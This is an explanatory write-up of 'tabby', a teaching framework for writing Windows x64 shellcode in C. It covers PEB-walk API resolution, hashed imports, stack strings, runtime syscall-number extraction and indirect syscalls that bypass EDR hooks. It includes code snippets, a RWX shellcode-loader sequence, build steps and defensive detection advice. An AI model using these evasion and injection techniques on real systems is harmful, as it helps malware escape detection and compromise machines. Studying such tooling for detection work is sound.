img/ folder; technical code snippets and the project-rationale table are reproduced verbatim with attribution. Prose summary is original.

Executive Summary
tabby is cocomelonc’s minimal teaching framework for building position-independent Windows x64 shellcode in C, designed for the upcoming Malware Development for Ethical Hackers (2026) course. The pitch: write your payload as a normal sc_main(PVOID base) function in C, let a small entry stub, a PEB walker, an FNV-1a hash table and a stack-string macro handle PIC, base-address recovery, API resolution and shellcode-safe strings — and let an indirect NT syscall dispatcher hide the syscall behind ntdll’s own syscall; ret gadget. The output is a flat shellcode.bin with no PE header, no IAT, no CRT — ready to inject into any Windows x64 process. The whole project is small enough to read end-to-end in one sitting: roughly 500 lines of C plus 80 lines of NASM.
What makes tabby interesting compared to the existing landscape isn’t novelty — every individual technique it uses (RDIP base recovery, PEB+EAT walking, FNV-1a hashed exports, indirect syscalls past EDR hooks) is in the public literature. The interesting part is that everything is laid bare in a small, readable codebase, and the entire build pipeline runs on Linux: mingw-w64 + nasm + a custom linker script + objcopy. No MSVC, no Windows SDK, no Wine. That makes it usable as a study object — you can read the entry stub, the PEB walker, the stack-string macro and the syscall stubs side by side and understand exactly which detection problem each piece solves.
The Four Ideas Holding It Together
cocomelonc structures the README around four concepts that map one-to-one to the framework’s files:
- Write shellcode in C, not assembly. The framework handles PIC, base-address recovery, API resolution, and syscall dispatch. The hand-written assembly is confined to a ~20-line entry stub and 3-instruction syscall stubs generated by a macro.
- No PE header, no IAT, no CRT. The output is a flat
.binstarting at byte 0 with_startat offset 0. There are no imports — every Windows API is resolved at runtime by FNV-1a hash via a PEB walk + EAT walk. There is nolibc— theSTACKSTRmacro builds strings on the stack so they never appear in.rdata. - Indirect syscalls that look clean on the call stack. Instead of executing
syscallourselves (which leaves the shellcode as the return address — flagged by call-stack-aware EDRs), each stub jumps to thesyscall; retbytes already living insidentdll’s own stub, past any EDR inline hook. The kernel sees a return address insidentdll. - Linux-only toolchain.
mingw-w64+nasm+ a custom linker script +objcopy. Zero Windows dependency to build.
Each component answers a specific detection problem:
entry.asm— how does shellcode find its own base address? (RDIP)resolve.c— how do we call Windows APIs with no IAT? (PEB + EAT walk)pic.h— how do we avoid string IOCs? (FNV-1a hashes + STACKSTR)stubs.asm— how do we bypass EDR hooks on ntdll? (indirect syscalls)syscall.c— how do we get SSNs without hardcoding them? (runtime extraction)flat.ld— how do we produce raw bytes from a normal toolchain? (linker script +objcopy)
cocomelonc positions the project explicitly against the alternatives: code generators like SysWhispers hide these mechanics behind generation steps, and full C2 frameworks like Cobalt Strike are too big to study end-to-end. tabby is described as the minimum viable framework that makes each technique inspectable.
What It Is Not
Three sharp negatives from the README that are worth restating before anyone misreads the project:
- Not a C2 or post-exploitation framework.
- Not a packer or crypter for existing PE files.
- Not a polished offensive tool. It is a teaching framework for the Malware Development for Ethical Hackers trainings. The README is structured around why each design decision was made — the project-structure rationale table is the spine of the documentation.
Core Concept 1 — Position-Independent Code
A normal Windows EXE assumes a fixed load address. The linker bakes absolute addresses for every function call, global variable and string literal into the binary. Move the code somewhere else in memory and those absolute addresses become garbage; the process crashes on the first dereference. Shellcode, by definition, must run no matter where it lands.
On x86-64 the basics are easier than on 32-bit because CALL rel32 and LEA reg, [rip+N] are already RIP-relative by design. The remaining problems are specific:
- Strings and constants. The compiler normally places them in
.rdataat a fixed address.tabbymerges.rdatainto.textvia the linker script and usesSTACKSTRto materialise strings on the stack at runtime. - Global variables. The SSN slots and the gadget pointer must live somewhere the stubs can find them via
[rel label]. They live in.texttoo; the linker script discards.dataand.bss. _startat byte 0. The entry object is pinned first in the linker script so jumping to the first byte ofshellcode.binalways lands in_start.
The entry stub (asm/entry.asm) uses the classic RDIP trick to recover its own load address:
call .here
.here:
pop rcx ; rcx = runtime address of .here
sub rcx, (.here - _start) ; rcx = base of shellcode
This gives sc_main() a pointer to the shellcode’s own base, which is useful when you embed a secondary payload or config block after the code (the demo example/alloc_exec.c does exactly this).
Core Concept 2 — API Resolution Without Imports
A normal program calls Windows APIs through the Import Address Table. The PE loader fills the IAT for you by calling LoadLibrary and GetProcAddress. A flat shellcode blob has no IAT — you have to find APIs yourself.
The canonical mechanism is a walk of the Process Environment Block (PEB):
gs:[0x60] -> PEB
└─ Ldr -> PEB_LDR_DATA
└─ InLoadOrderModuleList (doubly-linked)
├─ ntdll.dll
├─ kernel32.dll
└─ ...
Every loaded DLL is in this list along with its base address and name. Once you have a module base, you walk its Export Address Table (EAT) — three parallel arrays of names, ordinals and function RVAs — to find a specific export.
Doing this by string comparison is noisy and leaves IOCs. tabby hashes the export names instead and compares those. The hash function is FNV-1a 32-bit — fast, well-distributed, trivial to implement without a CRT:
DWORD fnv1a(const char *s) {
DWORD h = 0x811c9dc5;
while (*s) { h ^= (BYTE)*s++; h *= 0x01000193; }
return h;
}
Pre-computed hash constants live in include/ntapi.h. The tools/hash.py helper generates or verifies them:
$ python3 tools/hash.py NtAllocateVirtualMemory ntdll.dll
NtAllocateVirtualMemory -> 0xca67b978u
ntdll.dll -> 0xa62a3b3bu

tools/hash.py. Source: original repository.The DLL-name comparison is case-insensitive (the names are lowercased during the LDR walk). Export names are compared case-sensitive because the EAT preserves the original casing of each export.
Core Concept 3 — Indirect Syscalls
Calling something like NtAllocateVirtualMemory from shellcode via the normal ntdll export is caught by modern EDRs. The EDR installs an inline hook: it overwrites the first bytes of the ntdll stub with a JMP into its own code, inspects the call, and then either lets it proceed or blocks it.
Direct syscalls bypass the hook by setting up the system-call number (SSN) in EAX and executing syscall ourselves:
mov eax, 0x18 ; SSN for NtAllocateVirtualMemory
mov r10, rcx ; NT ABI: r10 must mirror rcx
syscall
This dodges the inline hook, but it creates a new problem: the thread call stack shows our_shellcode+N → NtAllocateVirtualMemory. Call-stack-aware EDRs flag any syscall whose return address isn’t inside ntdll.
Indirect syscalls fix this. Instead of executing syscall ourselves, we jump to the syscall; ret instruction pair that already exists inside ntdll’s own stub — past the EDR hook. Looking at ntdll!NtAllocateVirtualMemory:
ntdll!NtAllocateVirtualMemory:
4C 8B D1 mov r10, rcx <- hook overwrites here
B8 18 00 00 00 mov eax, 0x18
0F 05 syscall <- we jump to here
C3 ret
Now the return address the kernel sees is inside ntdll. The call stack looks clean.
The SSN itself is extracted at runtime by scanning the ntdll stub for the mov eax, imm32 byte pattern (0xB8). This works even on hooked stubs because hooks typically clobber only the first bytes (the mov r10, rcx prologue) and leave the mov eax sequence intact further down:
static DWORD extract_ssn(PBYTE stub) {
for (int i = 0; i < 32; i++) {
if (stub[i] == 0xB8) {
DWORD ssn = *(DWORD *)(stub + i + 1);
if (ssn < 0x600) return ssn; // sanity: no NT SSN is >= 0x600
}
}
return (DWORD)-1;
}
Core Concept 4 — The Linux-Only Toolchain
A Windows PE is compiled for Windows but the compilation itself is just C and assembly source going through a normal toolchain. mingw-w64 is a complete Win64 cross-compiler that runs on Linux and produces native Windows COFF objects and PE executables. The flat-binary extraction step uses objcopy to peel the .text section out of the PE wrapper. The pipeline as cocomelonc lays it out:
C source -> x86_64-w64-mingw32-gcc -> Win64 COFF .o
ASM -> nasm -f win64 -> Win64 COFF .o
COFF .o -> x86_64-w64-mingw32-ld -> PE .elf (single .text section)
PE .elf -> x86_64-w64-mingw32-objcopy -> shellcode.bin (raw bytes)
Nothing in this pipeline touches Windows. The output runs on Windows because the machine code itself is Win64-ABI compliant.
Repository Layout
tabby/
├── include/
│ ├── types.h windows types from scratch - no SDK, no CRT headers
│ ├── pic.h FNV-1a hash, STACKSTR macro, GETAPI helper, module hashes
│ └── ntapi.h NT function pointer types, sc_* declarations, hash constants
├── src/
│ ├── crt.c sc_memcpy / sc_memset / sc_memcmp / sc_strlen
│ ├── resolve.c find_module (PEB walk) + resolve_export (EAT walk) + find_syscall_gadget
│ └── syscall.c SSN extraction + syscall_init()
├── asm/
│ ├── entry.asm _start at byte 0: RDIP -> sc_main(base)
│ └── stubs.asm SSN slots + g_syscall_gadget + indirect syscall stubs (8 NT functions)
├── ld/
│ └── flat.ld linker script: flatten .text and .rdata$* into single .text at offset 0
├── example/
│ ├── exec.c minimal demo: PEB walk -> kernel32 -> WinExec("calc.exe")
│ └── alloc_exec.c full demo: syscall init -> NtAlloc -> NtWrite -> NtProtect RWX -> NtCreateThreadEx
└── tools/
├── hash.py FNV-1a pre-computation for ntapi.h constants
└── loader.c minimal Win64 test loader: maps shellcode.bin and executes it
Building It
Install on Ubuntu / Debian:
sudo apt install mingw-w64 nasm binutils-mingw-w64-x86-64

Clone and build:
git clone https://github.com/cocomelonc/tabby
cd tabby
make
Expected output:
nasm -f win64 -I include/ asm/entry.asm -o obj/entry.o
nasm -f win64 -I include/ asm/stubs.asm -o obj/stubs.o
x86_64-w64-mingw32-gcc ... -c src/crt.c -o obj/crt.o
x86_64-w64-mingw32-gcc ... -c src/resolve.c -o obj/resolve.o
x86_64-w64-mingw32-gcc ... -c src/syscall.c -o obj/syscall.o
x86_64-w64-mingw32-gcc ... -c example/alloc_exec.c -o obj/alloc_exec.o
x86_64-w64-mingw32-ld -T ld/flat.ld --gc-sections -o bin/shellcode.elf ...
x86_64-w64-mingw32-objcopy --only-section=.text -O binary ...
[=^..^=] shellcode.bin 1760 bytes

shellcode.bin at 1760 bytes including the indirect-NT-syscall machinery. Source: original repository.The single warning (section below image base) is expected because the linker script intentionally places .text at virtual address 0 so the flat binary starts at byte 0.
A smaller standalone test shellcode (PEB walk + WinExec only, no indirect NT syscalls) is also available:
make exec # produces bin/exec.bin (~416 bytes)

WinExec, ~416 bytes. Source: original repository.Verifying the Output Bytes
Disassemble the first bytes on Linux to confirm _start is at offset 0:
ndisasm -b 64 bin/shellcode.bin | head -20
Expected:
00000000 53 push rbx
00000001 57 push rdi
00000002 56 push rsi
00000003 4883EC20 sub rsp,byte +0x20 ; shadow space, preserves 16-byte alignment
00000007 E800000000 call 0xc
0000000C 59 pop rcx ; <- RDIP trick
0000000D 4883E90C sub rcx,byte +0xc ; rcx = base of shellcode
00000011 E8XXXXXXXX call sc_main
...
0000001E 6690 xchg ax,ax ; padding to 0x20
00000020 0000 ssn_NtAllocateVirtualMemory (dd 0, populated at runtime)
00000024 0000 ssn_NtWriteVirtualMemory
...
00000040 0000 g_syscall_gadget (dq 0)
00000048 8B0500000000 mov eax,[rel ssn_NtAllocateVirtualMemory] ; <- first syscall stub

ndisasm output — _start at offset 0, RDIP sequence at 0x07–0x0D, SSN slots in .text from 0x20, first syscall stub at 0x48. Source: original repository.The RDIP sequence at 0x07–0x0D is the canonical PIC base-address recovery. The SSN slots and the gadget pointer live in .text at offsets 0x20–0x47 so they survive the objcopy --only-section=.text extraction and remain reachable via RIP-relative addressing at any load address. The first syscall stub starts at 0x48.
Running It on Windows
bin/shellcode.bin is a raw byte blob — not an executable. To run it on Windows you need a loader: a normal Win32 program that maps the blob into memory and jumps into it.
Build the loader
On Linux, cross-compile tools/loader.c with:
make loader
This produces bin/loader.exe via mingw-w64 — still no Windows required.

loader.exe on Linux with x86_64-w64-mingw32-gcc. Source: original repository.Deploy and run
Copy both files to the Windows machine and run:
.\loader.exe shellcode.bin

shellcode.bin running on Windows — full indirect-NT-syscall pipeline pops calc.exe. Source: original repository.Or, to test the smaller standalone shellcode first:
.\loader.exe exec.bin

exec.bin — the PEB-walk-only variant — calling WinExec("calc.exe") directly. Source: original repository.Both pop calc.exe. The difference: exec.bin calls WinExec directly (PEB walk + EAT walk only) while shellcode.bin does the full indirect-NT-syscall injection pipeline (NtAllocateVirtualMemory → NtWriteVirtualMemory → NtProtectVirtualMemory → NtCreateThreadEx) using exec.bin’s bytes as the embedded payload. If exec.bin pops calc but shellcode.bin doesn’t, the bug is somewhere in the indirect-syscall path (SSN extraction, gadget address, stub calling convention, or NtCreateThreadEx arguments) — not in the framework basics.
What the loader does
fopen("shellcode.bin", "rb") // reads the raw bytes
VirtualAlloc(NULL, sz, RW) // allocates a private RW region
fread -> buf // copies shellcode in
VirtualProtect(buf, sz, RWX) // flips the region to execute-read-write
CreateThread(buf) // spawns a thread at byte 0
WaitForSingleObject(thread, INFINITE) // waits for shellcode to return
VirtualFree + CloseHandle // cleans up
The region is mapped RWX (not RX) because syscall_init() writes the extracted SSN values into the shellcode’s own .text section at runtime. Without write access the first store would #AV and the thread would die silently.
The loader prints the load address before jumping so you can attach a debugger at the right offset:
[=^..^=] loaded 1760 bytes from shellcode.bin
[=^..^=] executing at 0x000001A2B3C40000
The bundled example payload (example/alloc_exec.c) spawns calc.exe via the following sequence:
- Allocate a fresh RW region via
NtAllocateVirtualMemory(indirect syscall). - Write an embedded mini-shellcode (
PAYLOAD[]=example/exec.ccompiled: PEB walk →WinExec("calc.exe")). - Flip the region to RWX via
NtProtectVirtualMemory. - Spawn a thread on it via
NtCreateThreadEx. - Wait for the thread, close the handle, free the region.
Swap PAYLOAD[] with any position-independent x64 shellcode and rebuild with make.
Writing Your Own Shellcode
- Copy
example/alloc_exec.corexample/exec.cas a starting template, or create a new file inexample/. - Write a
sc_main(PVOID base)function. If you call anysc_Nt*stub, callsyscall_init(ntdll)first.baseis the runtime address of byte 0 of your shellcode — useful if you embed config or a secondary payload after the code. - Add a build rule for your
.cfile inMakefileand list its.oinC_OBJS(or replacealloc_exec.o). - Run
make(ormake execfor a variant that excludes the syscall stubs entirely).
Using the PEB resolver
PVOID ntdll = find_module(H_NTDLL);
PVOID kernel32 = find_module(H_KERNEL32);
To resolve any export by name:
typedef HANDLE (*GetStdHandle_t)(DWORD);
GetStdHandle_t pGetStdHandle = (GetStdHandle_t) resolve_export(kernel32, H_GetStdHandle);
Or with the GETAPI macro:
HANDLE h = GETAPI(H_KERNEL32, H_GetStdHandle, GetStdHandle_t)(STD_OUTPUT_HANDLE);
Using the indirect syscalls
After syscall_init(ntdll), call the sc_Nt* functions exactly like the real NT API:
PVOID region = NULL;
SIZE_T size = 4096;
NTSTATUS st = sc_NtAllocateVirtualMemory(
(HANDLE)-1, // current process
®ion,
0,
&size,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
if (!NT_SUCCESS(st)) { // handle error }
The set of pre-defined stubs:
| function | args | notes |
|---|---|---|
sc_NtAllocateVirtualMemory | 6 | allocate memory in a process |
sc_NtWriteVirtualMemory | 5 | write across process boundary |
sc_NtProtectVirtualMemory | 5 | change page protection |
sc_NtFreeVirtualMemory | 4 | release allocation |
sc_NtCreateThreadEx | 11 | spawn thread in local or remote process |
sc_NtWaitForSingleObject | 3 | wait on a handle |
sc_NtClose | 1 | close a handle |
sc_NtTerminateProcess | 2 | terminate a process |
tabby. Source: original repository.Strings — never in .rdata
Don’t write:
const char *msg = "hello"; // ends up in .rdata -> fixed address -> crash
Use STACKSTR instead:
STACKSTR(msg, "hello"); // pushed onto the stack character by character
Adding a new NT syscall stub
Step 1. Add the SSN slot and stub to asm/stubs.asm (slot lives in .text, not .bss, so it survives flat-binary extraction):
global ssn_NtOpenProcess
ssn_NtOpenProcess: dd 0
STUB NtOpenProcess, ssn_NtOpenProcess
The STUB macro emits a single, ABI-clean stub — no argument shifting needed for any number of arguments because the Win64 calling convention already places args 5+ at [rsp+28h], exactly where the kernel reads them.
Step 2. Declare the SSN extern and add the LOAD_SSN call inside src/syscall.c:
extern DWORD ssn_NtOpenProcess;
...
LOAD_SSN(ssn_NtOpenProcess, H_NtOpenProcess);
Step 3. Add the hash constant to include/ntapi.h:
#define H_NtOpenProcess 0xXXXXXXXXu
Compute it:
python3 tools/hash.py NtOpenProcess

Step 4. Declare the prototype in include/ntapi.h:
NTSTATUS sc_NtOpenProcess(HANDLE *, DWORD, OBJECT_ATTRIBUTES *, CLIENT_ID *);
How Indirect Syscall Dispatch Works, Step by Step
Take sc_NtAllocateVirtualMemory as the example. The C caller looks like:
sc_NtAllocateVirtualMemory((HANDLE)-1, ®ion, 0, &size, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);
The Win64 calling convention maps this to:
RCX = (HANDLE)-1
RDX = ®ion
R8 = 0
R9 = &size
[RSP+0x28] = MEM_COMMIT|MEM_RESERVE <- 5th arg on stack
[RSP+0x30] = PAGE_READWRITE <- 6th arg on stack
The stub itself is three instructions:
sc_NtAllocateVirtualMemory:
mov eax, dword [rel ssn_NtAllocateVirtualMemory] ; EAX <- SSN
mov r10, rcx ; R10 <- RCX (NT ABI)
jmp qword [rel g_syscall_gadget]
The stub doesn’t touch the stack, doesn’t shift arguments, doesn’t modify RSP. The Win64 calling convention already places args 5+ at [rsp+28h], [rsp+30h], and the kernel reads them from those offsets after syscall. Nothing extra is needed. At the point of JMP, the register/stack state is:
EAX = SSN
R10 = (HANDLE)-1 <- arg 1 (kernel reads R10, not RCX, after syscall)
RDX = ®ion <- arg 2
R8 = 0 <- arg 3
R9 = &size <- arg 4
[RSP+0x28] = MEM_COMMIT|MEM_RESERVE <- arg 5
[RSP+0x30] = PAGE_READWRITE <- arg 6
The JMP lands on the syscall; ret bytes inside ntdll’s own NtAllocateVirtualMemory stub — past any EDR hook. The kernel runs the syscall and rets back to the call site inside ntdll. The call stack the kernel (and any call-stack scanner) observes has a return address inside ntdll — not inside our shellcode.
Replacing the Payload
The example/alloc_exec.c demo ships with the compiled bytes of example/exec.c as PAYLOAD[]. To use your own:
static const BYTE PAYLOAD[] = {
// paste your x64 shellcode bytes here
0x48, 0x31, 0xc0, ...
};
Regenerate the bytes from a fresh make exec build:
make exec
python3 -c "
data = open('bin/exec.bin','rb').read()
for i in range(0, len(data), 12):
print(' ' + ', '.join(f'0x{b:02x}' for b in data[i:i+12]) + ',')
"
Or generate shellcode with any external framework (msfvenom, donut, your own) and paste the byte array. The framework handles allocation, write, protection flip and thread creation — you only need to provide the bytes.
The Project-Structure Rationale Table
This is the table at the heart of the README. It is a list of every compiler flag, linker option and design decision in tabby, each with the precise reason it’s there. It is reproduced verbatim because the reasoning is the entire point of the project as a teaching artifact.
| decision | reason |
|---|---|
-nostdlib -nostdinc -ffreestanding | zero CRT dependency; everything in the binary came from our own source |
-fno-builtin | prevents GCC emitting implicit memcpy/memset calls to CRT |
-mno-red-zone | Win64 does not honour the System V red zone; without this, signal delivery or asynchronous callbacks can corrupt our stack frame |
-mcmodel=small | critical: forces direct IMAGE_REL_AMD64_REL32 relocations for global symbol access. without it, mingw64 emits .refptr.<sym> indirection through .rdata that holds the absolute link-time VMA. for our flat binary with . = 0 that VMA is meaningless at runtime; every SSN store would crash with #AV |
-fno-asynchronous-unwind-tables | suppresses .eh_frame generation; we discard it anyway but this avoids linker noise |
-ffunction-sections -fdata-sections + ld --gc-sections | dead-code elimination: drops unused symbols (e.g. sc_memcpy if no STACKSTR is large enough to need it) so the binary contains only what’s actually called |
-Os | size optimisation keeps shellcode small; also discourages the compiler from emitting CRT helper calls |
nasm -f win64 | produces Win64 COFF objects compatible with mingw-w64-ld; full access to NASM macros for clean stub generation |
SSN slots in .text (via NASM dd 0) | mingw64 places C globals in .bss, which our linker script discards. defining the slots in NASM’s .text section guarantees they survive objcopy --only-section=.text and the stubs’ [rel ssn_*] displacements resolve correctly |
linker script at . = 0 + .rdata$* .text$* merged into .text | lets objcopy --only-section=.text produce a flat binary starting at offset 0 with no PE overhead; the $* wildcards catch COFF section groups emitted by -ffunction-sections/-fdata-sections |
entry stub sub rsp, 0x20 (not 0x28) | after push rbx/rdi/rsi the stack is already 16-aligned. sub rsp, 0x20 (32, a multiple of 16) preserves alignment so sc_main receives the Win64-ABI-correct RSP mod 16 = 8. otherwise MOVAPS inside any Windows DLL (e.g. CreateProcess inside WinExec) raises #AC and the thread dies silently |
| FNV-1a over CRC32 | equally fast, no special instructions required, fits in 6 lines of C |
| per-function SSN slots | avoids a generic do_syscall(ssn, ...) wrapper that would need to shift a variable number of stack arguments; each stub has the exact Win64 signature the kernel expects |
tabby. Source: original repository README.Key Takeaways
- Every technique
tabbyuses has been seen before. The contribution is the small, readable surface area: ~500 lines of C plus ~80 lines of NASM, with a one-paragraph rationale for every non-obvious choice. It’s built explicitly as a teaching artifact for the Malware Development for Ethical Hackers course. - Linux-only toolchain matters more than it sounds.
mingw-w64+nasm+ a custom linker script +objcopymeans no Windows / MSVC / Wine in the build pipeline — it also means CI for malware-research courses can run on stock Linux runners without complex VM orchestration. - Indirect syscalls are the headline EDR-evasion technique on display. Jumping to
ntdll’s ownsyscall; retdefeats both inline-hook detection and call-stack-aware detectors that flag syscalls returning into non-ntdllmemory. - SSNs are extracted at runtime, not hard-coded. Scanning the
ntdllstub for the0xB8(mov eax, imm32) byte pattern means the same shellcode works across Windows builds even as Microsoft reshuffles syscall numbers. - FNV-1a + STACKSTR eliminate plaintext IOCs. No DLL or function names in
.rdata, no plaintext payload strings — everything is either hashed at compile time or pushed onto the stack at runtime. - The flat-binary trick is mostly the linker script. The
. = 0placement, the.rdata$* .text$*wildcard merge into a single.text, and the explicit discard of.data/.bsstogether letobjcopy --only-section=.textproduce a byte-zero-aligned blob with no PE overhead. - The
-mcmodel=smallflag is load-bearing. The README explicitly calls this out: without it,mingw-w64introduces.refptr.<sym>indirection that breaks atVMA = 0. Anyone reproducing this trick on their own toolchain must keep this flag.
Defensive Recommendations
- Don’t rely on inline-hook detection alone. Indirect-syscall frameworks like
tabbyrenderntdllinline hooks useless — the hooked bytes are stepped over because the shellcode jumps directly to the post-hooksyscall; ret. Pair user-mode hooks with kernel-level telemetry (PsSetCreateThreadNotifyRoutineEx, ETW Threat Intelligence, syscall provenance) to catch the actual syscall regardless of how the call site reached it. - Hunt for call-stack provenance, not just call-stack-inside-ntdll. Indirect syscalls leave the kernel-visible return address inside
ntdll, but the stack frame below that is still attacker-controlled memory. Detection rules that walk the call stack and check whether the parent frame is mapped to a backed PE file (rather than an RX/RWX private allocation) will surface tabby-style payloads. Pavel Yosifovich’s and ETW Threat Intelligence based detectors do this; build it into your EDR if it isn’t there. - RWX private allocations from non-PE code are still the high-signal IOC. The bundled loader maps the shellcode RWX because the syscall stubs write SSNs into their own
.textat runtime. Any modern EDR should treat the creation of an RWX private allocation that subsequently hosts an executing thread (viaCreateThreadon the allocation base) as a near-certain malicious pattern outside of very narrow benign exceptions (JIT compilers in known processes). - Audit ETW Threat Intelligence event volume. EDRs that consume ETW-TI get a syscall-level view that bypasses user-mode hooks entirely. If your stack disables ETW-TI (some performance-tuned deployments do) you are blind to exactly this class of attack.
- Block
VirtualProtect/NtProtectVirtualMemorytransitions from RW to RX/RWX on private allocations from low-trust contexts via WDAC/AppLocker policies and EDR rules. The loader’s explicitRW → RWXflip is one of the single highest-signal events you can hook. - Treat unique FNV-1a / DJB2 / similar hash constants as YARA signal.
0xca67b978(the FNV-1a hash ofNtAllocateVirtualMemory) is a fingerprint of this exact tooling pattern. Build YARA rules that flag the simultaneous presence of FNV-1a constants in non-trivial binaries. - Process memory scanning that walks executable allocations and looks for missing PE headers at the start of the allocation is a high-confidence detector for flat-shellcode loaders.
tabby’sshellcode.binis byte-for-byte recognizable as not a PE because it begins with the entry stub at offset 0. - Educational frameworks like this are a defender’s gift. Read
tabbyend-to-end as a study of where modern offensive tooling actually puts its evasion. The same mechanics are present in commercial C2 frameworks at far greater scale; reading the minimal version helps your detection engineers reason about the full implementation.
Conclusion
tabby is interesting because it is small. Every line of code has a reason in the README, the entire build runs on Linux, and the four canonical evasion techniques — position-independent code, IAT-less API resolution, indirect NT syscalls past EDR hooks, and runtime SSN extraction — are laid out in roughly 500 lines of C and 80 of NASM. It is a teaching artifact, not a weapon, and the author calls that out explicitly. For defenders, it is a clean reference of exactly what they should expect to see in modern malware that does its job well, and exactly which detection patterns survive when the obvious ones (inline-hook detection, ntdll call-stack heuristics) don’t. The full source is on GitHub at cocomelonc/tabby.
Original text: cocomelonc/tabby on GitHub by cocomelonc. This tool is a proof of concept for educational purposes only; the original author takes no responsibility for any damage caused by misuse.

